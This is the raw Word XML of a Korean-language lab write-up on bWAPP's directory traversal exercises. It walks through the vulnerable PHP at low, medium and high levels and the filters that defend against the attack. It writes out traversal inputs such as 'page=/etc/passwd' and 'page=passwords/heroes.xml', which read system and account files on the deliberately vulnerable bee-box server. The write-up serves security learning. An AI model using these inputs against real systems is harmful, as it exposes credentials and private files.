          <w:p w14:paraId="4313214E" w14:textId="77777777" w:rsidR="00695203" w:rsidRPr="0035631E" w:rsidRDefault="00695203" w:rsidP="00183DF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4FF17E42" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5" w:rsidP="000F44BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB363E" w:rsidRPr="0035631E" w14:paraId="24ED32E6" w14:textId="77777777" w:rsidTr="0074270C">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B22FA29" w14:textId="77777777" w:rsidR="0040643D" w:rsidRPr="0035631E" w:rsidRDefault="004064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A302972" w14:textId="0641C16D" w:rsidR="0040643D" w:rsidRPr="0035631E" w:rsidRDefault="004064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564B27E" wp14:editId="3AA9B67D">
                  <wp:extent cx="6840001" cy="240745"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="260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240745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D2643" w14:textId="77777777" w:rsidR="0040643D" w:rsidRPr="0035631E" w:rsidRDefault="0040643D" w:rsidP="006F2E6D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7129B05D" w14:textId="7F1C1060" w:rsidR="0040643D" w:rsidRPr="0035631E" w:rsidRDefault="0040643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b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> vi /var/www/bWAPP/directory_traversal_2.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC5FA32" w14:textId="77777777" w:rsidR="0040643D" w:rsidRPr="0035631E" w:rsidRDefault="004064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31D5004" w14:textId="0BE93C96" w:rsidR="0040643D" w:rsidRPr="0035631E" w:rsidRDefault="004064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bee-box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커널에서 페이지 소스코드를 확인해보자.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ABC4D44" w14:textId="49BD6D77" w:rsidR="0040643D" w:rsidRPr="0035631E" w:rsidRDefault="004064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35631E" w14:paraId="59ABD332" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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65D08" w14:textId="7EE00224" w:rsidR="006F2E6D" w:rsidRPr="0035631E" w:rsidRDefault="0040643D" w:rsidP="006F2E6D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:noProof/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72BF20B4" wp14:editId="1BCAB294">
                  <wp:extent cx="6840001" cy="1596643"/>
                  <wp:effectExtent l="0" t="0" r="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159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35631E" w14:paraId="1D0A0CD6" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24D79DE7" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRPr="0035631E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EA14CBF" w14:textId="06AA6FF3" w:rsidR="0040643D" w:rsidRPr="0035631E" w:rsidRDefault="00B808B1" w:rsidP="00B808B1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난이도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low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의 경우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GET 방식으로 받은 directory 파라미터 변수의 값을 인자로 show_directory() 함수를 호출한다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F2E6D" w:rsidRPr="0035631E" w14:paraId="71D0848B" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="687529C6" w14:textId="02771F4A" w:rsidR="006F2E6D" w:rsidRPr="0035631E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B363E" w:rsidRPr="0035631E" w14:paraId="344D80BE" w14:textId="77777777" w:rsidTr="0074270C">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DA3E9D0" w14:textId="7FB4B69B" w:rsidR="006F2E6D" w:rsidRPr="0035631E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35631E" w14:paraId="2C4E066D" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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F0A62" w14:textId="5428BFF9" w:rsidR="006F2E6D" w:rsidRPr="0035631E" w:rsidRDefault="0028400A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3A599E01" wp14:editId="4A319116">
                  <wp:extent cx="6840001" cy="3887007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38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35631E" w14:paraId="1E6B60FC" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C1A0CD7" w14:textId="62EFA818" w:rsidR="006F2E6D" w:rsidRPr="0035631E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35631E" w14:paraId="491B9480" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="519B2D09" w14:textId="3707F862" w:rsidR="006F2E6D" w:rsidRPr="0035631E" w:rsidRDefault="0028400A" w:rsidP="00B808B1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난이도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medium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의 경우 </w:t>
            </w:r>
            <w:r w:rsidR="00B808B1" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> directory_traversal_check_2() 함수를 통해 입력값을 필터링을 거치고 있다. functions_external.php 파일에서 directory_traversal_check_2() 함수를 확인해보면 </w:t>
            </w:r>
            <w:r w:rsidR="00B808B1" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>'../', '..\\', '/..', '\..', '.' 문자</w:t>
            </w:r>
            <w:r w:rsidR="00B808B1" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>를 필터링하는 것을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F2E6D" w:rsidRPr="0035631E" w14:paraId="24FA886E" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A868073" w14:textId="641960ED" w:rsidR="0028400A" w:rsidRPr="0035631E" w:rsidRDefault="0028400A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35631E" w14:paraId="6B65B030" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DAB5BF9" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRPr="0035631E" w:rsidRDefault="006F2E6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5FF23EF2" w14:textId="661BAFA0" w:rsidR="0028400A" w:rsidRPr="0035631E" w:rsidRDefault="0028400A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4F2D8828" wp14:editId="7D8E8D18">
                  <wp:extent cx="6840001" cy="2342305"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="203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2342305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CF2D" w14:textId="250D7316" w:rsidR="006F2E6D" w:rsidRPr="0035631E" w:rsidRDefault="006F2E6D" w:rsidP="00B808B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5614D47F" w14:textId="4D893982" w:rsidR="00B808B1" w:rsidRPr="0035631E" w:rsidRDefault="00B808B1" w:rsidP="00B808B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hi</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">의 경우 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory_traversal_check_3() 함수를 통해 입력값 필터링을 거치고, 베이스 디렉터리 설정($base_path)까지 해주고 있다. functions_external.php 파일에서 directory_traversal_check_3() 함수를 확인해보면, 절대 경로를 반환하는 realpath() 함수를 사용하여 설정한 베이스 디렉터리의 절대 경로와 사용자가 입력한 디렉터리의 절대 경로가 일치하는지 확인하고 있다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1004CF50" w14:textId="24700A98" w:rsidR="00B808B1" w:rsidRPr="0035631E" w:rsidRDefault="00B808B1" w:rsidP="00B808B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79531EF0" w14:textId="31831DDF" w:rsidR="00B808B1" w:rsidRPr="0035631E" w:rsidRDefault="00B808B1" w:rsidP="00B808B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">위와 같이 난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">edium에서처럼 디렉터리를 이동할 수 있는 특수문자를 필터링하거나 난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>igh처럼 해당 페이지에서 접근이 가능하도록 허용하는 디렉터리를 지정해</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>두어 의도하지 않은 디렉터리에 접근하지 못하도록 하여 Directory Traversal 취약점을 대응할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CEF275" w14:textId="77777777" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB9" w:rsidP="008335CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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735CB9" w:rsidRPr="0035631E" w14:paraId="3856E617" w14:textId="77777777" w:rsidTr="00341A30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73F095C" w14:textId="7518BFED" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB9" w:rsidP="00341A30">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:bookmarkStart w:id="10" w:name="B_2"/>
            <w:bookmarkEnd w:id="10"/>
            <w:r w:rsidR="00243D3D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begin"/>
            </w:r>
            <w:r w:rsidR="00243D3D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instrText>HYPERLINK  \l "B_1"</w:instrText>
            </w:r>
            <w:r w:rsidR="00243D3D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</w:r>
            <w:r w:rsidR="00243D3D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separate"/>
            </w:r>
            <w:r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0"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">. 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dir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e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ct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o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ry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 xml:space="preserve"> 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Tr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a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ve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r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sa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l</w:t>
            </w:r>
            <w:r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 xml:space="preserve"> – Files</w:t>
            </w:r>
            <w:r w:rsidR="00243D3D"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35CB9" w:rsidRPr="0035631E" w14:paraId="4953862E" w14:textId="77777777" w:rsidTr="00341A30">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40EB53D9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EFC9542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Cs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[ Directory Traversal – Files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난이도 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 xml:space="preserve">: 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>l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ow ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF6CE41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244F6223" w14:textId="77777777" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB9" w:rsidP="00735CB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29A65CAF" wp14:editId="3B8BAACC">
            <wp:extent cx="6840001" cy="1985469"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="152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98546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74A0E0" w14:textId="77777777" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB9" w:rsidP="00735CB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페이지에 접속하면 상위 디렉터리로 이동을 시도하라는 문구를 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C61C7" w14:textId="77777777" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB9" w:rsidP="00735CB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이 페이지는 H</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">TTP </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">연결 요청에 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">메소드를 사용하므로 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 변수를 노출한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624FF62B" w14:textId="77777777" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB9" w:rsidP="00735CB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‘page’</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 변수에 상위 경로로 가는 상대경로(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>../)</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 입력하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">directory_traversal_2.php </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">페이지의 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">directory </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">변수로는 접근하지 못한 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>passswd</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 내용을 확인해본다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3B886" w14:textId="77777777" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB9" w:rsidP="00735CB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6E79F960" wp14:editId="5A5B4B72">
            <wp:extent cx="6840001" cy="5909353"/>
            <wp:effectExtent l="19050" t="19050" r="18415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590935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  <w:gridCol w:w="59"/>
      </w:tblGrid>
      <w:tr w:rsidR="00735CB9" w:rsidRPr="0035631E" w14:paraId="29C9469A" w14:textId="77777777" w:rsidTr="009D507E">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13EAAB8C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35631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p</w:t>
            </w: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age=/etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC3DC8C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0F0B3A9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정상적으로 출력되고 있음을 볼 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D293B3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Passwd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는 b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ee-box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서버에 접근할 수 있는 아이디와 접근 권한 등을 기록한 파일이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D10772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이 점을 보아 파일이 지정된 디렉터리와 파일명을 정확히 알고 있다면 원하는 데이터베이스 정보를 알아낼 수 있음을 판단하고 전 d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irectories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에서 봤던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passwords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디렉터리 아래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‘heroes.xml’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이라는 파일에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heroes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그룹의 계정 정보를 저장하고 있다는 추측 하에 접근을 시도해 볼 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1753D1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8F743A1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0EA54FF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1540152C" wp14:editId="45AE6024">
                  <wp:extent cx="6840001" cy="6223055"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="2540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6223055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BAED9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35631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p</w:t>
            </w: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age=passwords/heroes.xml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68FFB08B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424AC0C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마찬가지로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heroes.xml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이 출력되는 것을 볼 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE9233E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3FA0E6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B06D862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0A8218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D1A665F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8D624CD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A4EA198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59A04E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0BA2294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FCD3E6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FDF45C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3844180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3D1A87C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D3986D8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2F6F897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7AB96D1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CC5A13A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Cs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[ Directory Traversal – Files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난이도 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: medium/high ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64C6E49E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Cs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D3D643B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799E0AD1" wp14:editId="4062E140">
                  <wp:extent cx="6840001" cy="4925480"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="279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4925480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AF54F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page=../</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE1DBA6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2B44434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난이도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edium에서 page 변수 파라미터에 "../" 값을 넣고 페이지 요청을 해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본다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.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A92AA7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위와 같은 문구가 출력되는 것으로 보아 필터링 되고 있음을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD5FF2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8A9E3F1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특수문자만 필터링하고 있을 수 있으니, 같은 디렉터리에 위치해 있는 다른 파일을 조회해봤다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689A62B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(이 message.txt 파일은 /var/www/bWAPP 디렉터리에 위치한다.)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C9582E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488673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305EF5D6" wp14:editId="2FC5BA75">
                  <wp:extent cx="6840001" cy="5570257"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="1143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5570257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A3EC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page=bugs.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D4F6CC6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B0CD22D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보는 것처럼 Directory Traversal 취약점에 사용되는 특수문자를 필터링해도 같은 디렉터리에 있는 파일들을 조회할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E7F810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여기서는 특수한 상황으로 모든 페이지의 소스가 같은 디렉터리에 위치해 있기 때문에 소스코드까지 출력해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볼 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F24776D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파라미터 변수에 해당 페이지의 파일을 조회해 봤다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05063C82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B4C0BA2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02702837" wp14:editId="75546823">
                  <wp:extent cx="6840001" cy="6126956"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="266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6126956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73FD7" w14:textId="77777777" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB9" w:rsidP="00341A30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page=directory_traversal_1.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0708C37F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6408EF0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클라이언트에서는 접근이 허용되지 않은 PHP 코드까지 Directory Traversal 취약점을 통해 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B8890C" w14:textId="77777777" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00735CB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0AA950E" w14:textId="52EB14CC" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="009E4377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이제</w:t>
            </w:r>
            <w:r w:rsidR="00A155B8"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A155B8" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bee-box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 서버 내 코드를 확인해보자.</w:t>
            </w:r>
          </w:p>
